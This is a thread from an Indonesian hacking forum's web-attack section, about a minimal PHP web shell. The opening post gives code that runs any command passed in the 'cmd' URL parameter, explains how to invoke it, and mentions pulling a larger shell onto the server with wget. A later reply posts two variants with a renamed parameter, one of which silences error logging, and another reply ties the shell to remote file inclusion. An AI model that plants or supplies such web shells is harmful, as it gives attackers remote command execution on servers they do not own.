.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Simple Shell Command

Go down 
+5
cinta_code
casper
areg_noid
digitalcat
Voldemort
9 posters
PengirimMessage
Voldemort
BC Security
BC Security
Voldemort


Jumlah posting : 331
Points : 725
Reputation : 16
Join date : 04.07.11

Simple Shell Command Empty
PostSubyek: Simple Shell Command   Simple Shell Command Icon_minitimeFri Mar 02, 2012 2:55 am

kali ini simple shell command, biasa dipakai di server linux

Berikut code Simple Shell Command

Code:
 <?php
    echo '<pre>';system($_GET['cmd']);echo '</pre>';
    ?>

simpan misal dengan nama tes.php

lalu panggil dengan cara:

[You must be registered and logged in to see this link.]

dir = command untuk melihat isi directory

[You must be registered and logged in to see this image.]

kalau mau upload shell tinggal pakai perintah wget lokasi shell.

[You must be registered and logged in to see this link.]

dah ya semoga bermanfaat maling
Kembali Ke Atas Go down
digitalcat
BC Security
BC Security
digitalcat


Jumlah posting : 451
Points : 710
Reputation : 28
Join date : 31.10.11
Age : 42

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeFri Mar 02, 2012 10:16 am

keren.. nice share bro
Kembali Ke Atas Go down
areg_noid
Top Nubie
Top Nubie



Jumlah posting : 49
Points : 53
Reputation : 2
Join date : 26.01.12

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeSat Mar 03, 2012 8:21 am

simple banget, buat RFI.an iki...
Kembali Ke Atas Go down
casper
Pro Nubie
Pro Nubie
casper


Jumlah posting : 63
Points : 73
Reputation : 3
Join date : 22.08.11
Age : 32
Lokasi : casper@bt:~#

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeSat Mar 03, 2012 10:40 am

mnuju lokasi TKP dulu om ijin nyoba... :becak:
Kembali Ke Atas Go down
cinta_code
Trainee
Trainee
cinta_code


Jumlah posting : 87
Points : 102
Reputation : 3
Join date : 27.02.12

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeSat Mar 03, 2012 11:52 am

simple banget ya oms...
Kembali Ke Atas Go down
danexs
NuuBiiTooL
NuuBiiTooL
danexs


Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 21.03.12
Age : 36
Lokasi : samarinda

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeWed Mar 21, 2012 11:30 pm

mantap om
Kembali Ke Atas Go down
areg_noid
Top Nubie
Top Nubie



Jumlah posting : 49
Points : 53
Reputation : 2
Join date : 26.01.12

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeMon Apr 16, 2012 11:11 pm

Voldemort wrote:
kali ini simple shell command, biasa dipakai di server linux

Berikut code Simple Shell Command

Code:
 <?php
    echo '<pre>';system($_GET['cmd']);echo '</pre>';
    ?>

simpan misal dengan nama tes.php

lalu panggil dengan cara:

[You must be registered and logged in to see this link.]

dir = command untuk melihat isi directory

[You must be registered and logged in to see this image.]

kalau mau upload shell tinggal pakai perintah wget lokasi shell.

[You must be registered and logged in to see this link.]

dah ya semoga bermanfaat maling

setelah saya analisa
wkwkwkwk kaya orang hebat aja menganalisa,

jadi, apa bila ketika file tersebut di akses, tanpa adanya "command" maka akan menyebabkan sebuah error_log

jadi scriptnya saya modif seperti ini

Code:

<?php
$test = $_GET['areg_noid'];
if ($test){
echo "<pre>";
system($test);
echo "</pre>";
}
?>

atau, lebih simpelnya seperti ini:

Code:

<?php
error_reporting(0);
echo "<pre>";
system($_GET['areg_noid']);
echo "</pre>";
?>

hehehe......


namun, file ini tidak dapat berfungsi, apabila fungsi php system pada server, telah di "disable"
Kembali Ke Atas Go down
exploi
Newbie - Hack
Newbie - Hack
exploi


Jumlah posting : 408
Points : 464
Reputation : 13
Join date : 02.11.11
Lokasi : exploit

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeTue Apr 17, 2012 12:46 am

:fxx: :fxx: :fxx:
Kembali Ke Atas Go down
xrootx
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 01.05.12

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeSun May 06, 2012 7:10 am

om di qw pke backtrack bisa apa gak nie pke cara itu di konsole nya
Kembali Ke Atas Go down
G32x_ky.bat
Trainee
Trainee
G32x_ky.bat


Jumlah posting : 99
Points : 119
Reputation : 5
Join date : 23.06.11
Age : 34
Lokasi : Di depan Masjid

Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitimeFri May 11, 2012 7:59 pm

Nice .. thx bro! Simple Shell Command 37346
Kembali Ke Atas Go down
http://www.black-geeky.com/links-exchange/
Sponsored content





Simple Shell Command Empty
PostSubyek: Re: Simple Shell Command   Simple Shell Command Icon_minitime

Kembali Ke Atas Go down
 
Simple Shell Command
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Beberapa Command (perintah) dalam Shell
» MENJALANKAN OS COMMAND ATAU SHELL SCRIPT DARI PL/SQL
» command yang ada di mIRC
» Command linux, freeBSD
» Basic command for linux

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: